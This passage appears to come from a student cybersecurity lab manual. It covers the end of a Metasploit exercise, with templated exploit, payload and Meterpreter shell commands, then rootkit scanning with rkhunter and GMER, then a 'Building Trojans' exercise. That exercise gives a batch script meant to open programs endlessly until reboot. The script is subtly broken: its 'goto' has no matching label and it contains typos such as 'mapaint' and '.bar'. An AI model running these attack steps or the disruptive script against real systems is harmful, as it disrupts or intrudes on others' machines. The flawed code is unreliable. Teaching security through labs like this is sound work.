Select the exploit:
use [exploit path]
Set target options:
set RHOST [target-ip]
set RPORT [target-port]
 set PAYLOAD [payload name]
set LHOST [your-ip]
set LPORT [your-port]
7. Run the Exploit:
- Execute the attack:
exploit
8. Post-Exploitation:
- If successful, use Meterpreter for tasks like:
sysinfo
shell
download/upload
9. Close the Session:
- Exit Meterpreter and Metasploit cleanly.

RESULT :
Metasploit was successfully installed and configured on the system. A simulated penetration
test was performed using the Metasploit Framework.
Ex. No : 13
Defeating Malware - Rootkit hunter
Date :

AIM:
To install a rootkit hunter and find the malwares in a computer.

ROOTKIT HUNTER:
• rkhunter (Rootkit Hunter) is a Unix-based tool that scans for rootkits, backdoors and
possible local exploits.
• It does this by comparing SHA-1 hashes of important files with known good ones in
online databases, searching for default directories (of rootkits), wrong permissions,
hidden files, suspicious strings in kernel modules, and special tests for Linux and
FreeBSD.
• rkhunter is notable due to its inclusion in popular operating systems (Fedora, Debian,
etc.)
• The tool has been written in Bourne shell, to allow for portability. It can run on almost
all UNIX-derived systems.

GMER ROOTKIT TOOL:

• GMER is a software tool written by a Polish researcher Przemysław Gmerek, for
detecting and removing rootkits.
• It runs on Microsoft Windows and has support for Windows NT, 2000, XP, Vista, 7, 8
and 10. With version 2.0.18327 full support for Windows x64 is added.

Step 1

Visit GMER's website (see Resources) and download the GMER executable.
Click the "Download EXE" button to download the program with a random file name, as some
rootkits will close “gmer.exe” before you can open it.
Step 2

Double-click the icon for the program.

Click the "Scan" button in the lower-right corner of the dialog box. Allow the program to
scan your entire hard drive.

Step 3

When the program completes its scan, select any program or file listed in red. Right-click it
and select "Delete."
If the red item is a service, it may be protected. Right-click the service and select "Disable."
Reboot your computer and run the scan again, this time selecting "Delete" when that service is
detected.
When your computer is free of Rootkits, close the program and restart your PC.

RESULT:
In this experiment a Root kit hunter software tool has been installed and the Root kits
have been detected.
 EX.NO:14

DATE: Defeating Malware-Building Trojans

AIM:
To build a Trojan and know the harmness of the trojan malwares in a computer system.

PROCEDURE:
1. Create a simple trojan by using Windows Batch File (bar)
2. Type these below code in notepad and save it as Trojan.bat
3. Double click on Trojan.bat file.
4. When the trojan code executes, it will open MS-Paint, Notepad, Command Prompt, Explorer,
etc., infinitely.
5. Restart the computer to stop the execution of this trojan.

TROJAN:

In computing, a Trojan horse, or trojan, is any malware which misleada users of its true intent.

Trojans are generally spread by some form of social engineering, for example where a user is
duped into executing an email attachment disguised to appear not suspicious, (e.g., a routine
form to be filled in), or by clicking on some fake advertisement on social media or anywhere
else.
Although their payload can be anything, many modern forms act as a backdoor, contacting a
controller which can then have unauthorized access to the affected computer.
Trojans may allow an attacker to access users' personal information such as banking
information, passwords, or personal identity.

Example: Ransomware attacks are often carried out using a trojan

CODE
Trajan.bar
echo off
start mapaint
start notepad
start cmd
start explorer
start control
start calc
goto x

OUTPUT:

(MS-Paint, Notepad, Command Prompt, Explorer will open infinitely)

RESULT:
The malware and the harmness of the malware software has been studied successfully.